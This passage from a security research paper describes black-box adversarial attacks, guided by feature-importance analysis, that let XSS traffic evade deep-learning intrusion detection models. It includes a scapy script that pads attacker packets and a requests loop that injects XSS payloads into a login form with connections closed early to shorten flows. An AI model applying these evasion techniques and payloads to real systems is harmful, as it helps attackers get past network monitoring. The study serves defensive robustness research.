  3. We used a heatmap (Fig. 13) to check how independent each feature is. Fwd Seg Size Min had a sufficiently low correlation with the other features, indicating that it is relatively independent. Our experimental analysis showed that, during XSS attacks, the attacker's minimum-segment-size packets were SYN or ACK packets, so we hypothesized that perturbing these packets would have minimal impact on other features.

  4. Fwd Seg Size Min had the biggest impact on the FN samples and was independent enough to be perturbed.

  5. We implemented the perturbation in the problem space by padding the SYN and ACK packets sent from the attacker host (a sketch follows below). Even with these perturbations, all XSS attacks succeeded.
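
The scapy sketch below illustrates the padding offline on a captured trace by appending filler bytes to empty attacker segments, which raises the minimum forward segment size. The live attack instead crafted padded packets directly; the attacker address, pad length, and file names are hypothetical.

    from scapy.all import rdpcap, wrpcap, IP, TCP, Raw

    ATTACKER_IP = "192.0.2.20"   # hypothetical attacker address
    PAD = b"\x00" * 12           # illustrative padding length

    pkts = rdpcap("xss_attack.pcap")             # hypothetical capture
    for p in pkts:
        if IP in p and TCP in p and p[IP].src == ATTACKER_IP \
                and len(p[TCP].payload) == 0:    # bare SYN/ACK segments
            p[TCP].add_payload(Raw(PAD))         # enlarge the forward segment
            del p[IP].len, p[IP].chksum, p[TCP].chksum  # recompute on write
    wrpcap("xss_attack_padded.pcap", pkts)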

Fig. 11: Feature importance for NIDS FN samples in XSS (CIC-IDS2017-based model)

Fig. 12: 3D scatter plot of TP and FN samples in XSS (CIC-IDS2017-based model)

Fig. 13: Correlation matrix of features in XSS of CIC-IDS2017

We also evaluated the evasion rate of the adversarial examples. The rate was 100%, showing that our adversarial examples could completely evade detection by the NIDS.

6.4.2 Evaluation on TON_IoT Dataset-Based Model

Following the same procedure as in Sect. 6.4.1, we generated AEs for the TON_IoT dataset-based model.

  1. Figure 14 shows the XAI analysis results for the FN samples. Based on the feature importance ranking in the graph, the top three features are proto, conn_state, and src_ip_bytes. However, we do not perturb proto because it is part of a flow identifier, and conn_state, which represents the summarized state of each connection, is difficult to perturb. Thus, instead of these two features, we selected the fourth most important feature, src_pkts, and the fifth, duration. The detailed explanations of the selected three features are as follows:

    • src_ip_bytes: Number of IP bytes sent by the Web client.

    • src_pkts: Number of packets sent by the client.

    • duration: How long the connection lasted.

  2. We plotted the TP and FN samples in 3D space, as shown in Fig. 15. In this graph, the distributions of TP and FN overlap, making them difficult to distinguish, so we prepared an additional graph (Fig. 16) plotting only the FN samples. From these graphs, we can see that the FN samples are concentrated near the origin while the TP samples are relatively dispersed. This indicates that decreasing the value of each feature makes it possible to evade the NIDS model's detection.

  3. The heatmap (Fig. 17) showed that duration has a smaller correlation with other features than the other two candidates.

  4. Based on the analyses of Figs. 15, 16, and 17, we decided to generate AEs by manipulating duration to be as close to 0 as possible.

  5. By terminating the session each time an XSS payload was injected into the login page, we succeeded in making duration smaller (a sketch follows below). This perturbation did not affect the XSS attacks' function at all.
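
A minimal sketch of this transformation with the requests library is shown below; the target URL, form fields, and payload list are hypothetical. A fresh session with a Connection: close header tears down the TCP connection right after each response, keeping the per-flow duration near zero.

    import requests

    TARGET = "http://192.0.2.10/login"          # hypothetical victim URL
    payloads = [
        "<script>alert('xss');</script>",
        "<img src=x onerror=alert(1)>",
    ]

    for vector in payloads:
        # One short-lived TCP session per payload: "Connection: close"
        # ends the connection after the response, so duration stays small.
        with requests.Session() as s:
            s.headers["Connection"] = "close"
            r = s.post(TARGET, data={"username": vector, "password": "x"},
                       timeout=5)
            print(vector[:30], r.status_code)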

Fig. 14: Feature importance for NIDS FN samples in XSS attacks (TON_IoT Dataset-Based Model)

Fig. 15: 3D scatter plot of TP and FN samples in XSS attacks (TON_IoT Dataset-Based Model)

Fig. 16: 3D scatter plot of only FN samples in XSS attacks (TON_IoT Dataset-Based Model)

Fig. 17: Correlation matrix of features in XSS attacks of TON_IoT Dataset

Our proposed AEs achieved an evasion rate of 100%. These results demonstrate that our method is also effective against the TON_IoT dataset-based model in the XSS attack scenario.

6.5 Discussion

We summarize the results of our experiments and compare them with those of our previous work [34] in Table 2. The table shows that our proposed black-box attacks achieve high evasion rates across two different NIDS models and two attack scenarios, quantitatively demonstrating the effectiveness of our method in generating highly evasive AEs.

Table 2: Comparison of evasion rates between our proposed black-box attack and the existing white-box attack

Additionally, as the table shows, our proposed black-box attack achieved the same evasion rates as the existing white-box attack. This reveals that our method maintains high performance without requiring access to internal information of the targeted models, such as gradients. The success of our black-box approach shows that it is feasible to conduct practical and effective adversarial attacks on DL-based NIDS, addressing a significant drawback of the previous white-box method. Our method also achieves a high evasion rate on both NIDS models, indicating that its effectiveness is not limited to specific feature sets or training datasets. These results suggest that our black-box method can be applied effectively to a wide range of DL-based NIDS models, enhancing its utility and relevance in real-world scenarios. In conclusion, our proposed method can contribute to evaluating and enhancing the robustness of DL-based NIDS in more realistic scenarios.

On the other hand, our study has several limitations. The first is that the constraints in our attack scenario are still relatively moderate. KernelSHAP, used as the XAI method in our proposed attacks, requires access to both the input data and the output scores of the targeted NIDS model (either probabilities or, in some cases, pre-softmax logits). This means that our proposed attacks fall into the category of score-based black-box attacks, as defined in [28]. However, in real-world scenarios, attackers often do not have access to the output scores of the targeted NIDS. We therefore plan to improve our method so that AEs can be generated under more restrictive and realistic conditions where such scores are unavailable. The second limitation is that, in our approach, the selection of features to be perturbed and the implementation of AEs in the problem space are conducted manually. Given that adversarial training requires a large number of AEs, this manual generation process is not practical. In future work, we will focus on automating our proposed method, potentially by leveraging large language models (LLMs). The third limitation is the lack of quantitative comparison with other state-of-the-art methods. Comparing computational cost and runtime efficiency would help clarify the advantages of our proposed method, but our current approach involves manual processes, making it difficult to measure computational complexity in a fair and consistent manner. As part of our future work, we plan to automate these processes, which will enable runtime comparisons with existing methods.

7 Conclusion

We previously proposed XAI-driven white-box adversarial attacks on DL-based NIDS and showed their effectiveness in [34]. In this paper, we improved this method by evolving it from a white-box approach into a black-box approach. We then implemented the black-box approach and evaluated it across different NIDS models to confirm its generalizability. Our proposed method achieved high evasion rates (minimum: 95.7%, maximum: 100%) without requiring internal information about the targeted NIDS, regardless of NIDS model or attack scenario. Based on these results, we conclude that our proposed method can generate highly evasive and practical AEs, contributing to the assessment and advancement of DL-based NIDS.